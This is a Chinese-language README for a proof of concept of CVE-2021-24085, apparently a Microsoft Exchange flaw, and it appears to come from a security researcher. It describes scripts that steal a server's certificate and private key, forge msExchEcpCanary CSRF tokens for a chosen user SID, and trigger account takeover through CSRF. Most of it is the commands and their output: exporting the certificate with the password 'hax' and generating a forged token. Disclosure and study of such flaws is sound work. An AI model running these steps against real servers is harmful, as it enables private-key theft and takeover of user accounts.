这是 CVE-2021-24085 的概念验证。
poc.py 下载包含私钥的目标证书文件YellowCanary 根据 SID 为特定用户生成 msExchEcpCanary CSRF 令牌poc.js 是用于触发账户接管漏洞的 CSRF 利用代码我没有提供 malicifest.xml 文件,但你可以从以下参考资料部分中找到关于如何生成恶意清单文件的信息。
获取包含私钥的证书:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
现在你可以使用 YellowCanary 通过目标用户的 SID 生成 CSRF 令牌:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.